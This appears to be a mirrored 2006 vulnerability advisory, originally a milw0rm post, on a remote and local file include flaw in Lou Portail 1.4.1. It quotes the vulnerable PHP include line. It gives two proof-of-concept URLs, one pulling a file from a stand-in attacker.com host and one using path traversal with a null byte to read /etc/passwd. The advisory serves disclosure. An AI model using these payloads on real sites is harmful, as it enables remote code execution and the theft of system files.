Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:14798
HistoryOct 23, 2006 - 12:00 a.m.

Lou Portail 1.4.1 Remote|Local File Include Vulnerability

2006-10-2300:00:00
vulners.com
54

## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##

[ Lou Portail 1.4.1 ]

Class: Remote|Local File Include Vulnerability

Patch: Unavailable

Published 2006/10/18

Remote: Yes

Local: No

Type: High

Site: http://louportail.free.fr/

Author: MP

Contact: [email protected]

#################################################################

Vuln Code (admin/admin_module.php):

<?..
include ("$g_admin_rep/admin_utils.$g_ext");
…?>

#Vuln 1.0 -> require register_globals = On
http://louportail.com/admin/admin_module.php?g_admin_rep=http://attacker.com&amp;g_ext=txt

#Vuln 2.0 -> require magic_quotes_gpc = Off
http://louportail.com/admin/admin_module.php?g_admin_rep=../../../../../../../../../../../../../../../../../../../../etc/passwd&#37;00

milw0rm.com [2006-10-20]